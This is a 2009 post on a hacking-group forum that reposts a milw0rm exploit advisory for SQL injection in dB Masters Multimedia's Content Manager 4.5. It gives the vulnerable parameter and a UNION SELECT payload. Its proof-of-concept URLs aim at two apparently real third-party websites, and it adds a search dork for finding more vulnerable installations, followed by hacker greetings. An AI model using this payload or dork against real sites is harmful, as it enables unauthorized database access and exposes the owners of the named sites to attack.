Multi Ethnic Hacking Group


    dB Masters Multimedia's Content Manager 4.5 SQL Injection Vulnerability

    Share
    avatar
    Foxi
    Admin

    Posts : 92
    Reputation : -1
    Join date : 2009-07-08

    dB Masters Multimedia's Content Manager 4.5 SQL Injection Vulnerability

    Post by Foxi on Thu Jul 23, 2009 4:19 am

    Code:
    ===========================================================================================


      [o] dB Masters Multimedia's Content Manager 4.5 SQL Injection Vulnerability

          Software : dB Masters Multimedia's Content Manager version 4.5
          Vendor  : http://www.dbmasters.net/
          Author  : NoGe
          Contact  : noge[dot]code[at]gmail[dot]com
          Blog    : http://evilc0de.blogspot.com


    ===========================================================================================


      [o] Vulnerable file

          index.php



      [o] Exploit

          http://localhost/[path]/index.php?n=xx&id=[SQL]



      [o] Proof of concept

          http://www.fosada.za.org/index.php?n=62&id=-57+union+select+1,version()--
          http://www.colourmebeautiful.com.au/index.php?n=1&id=-1+union+select+1,version()--



      [o] Dork

          "Powered by dB Masters Multimedia's Content Manager"


    ===========================================================================================


      [o] Greetz

          MainHack BrotherHood [ http://serverisdown.org/news ]
          Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa Angela Zhang
          H312Y yooogy mousekill }^-^{ kaka11 zxvf martfella
          skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


    ===========================================================================================

    # milw0rm.com [2009-07-16]


      Current date/time is Sat Sep 23, 2017 9:32 am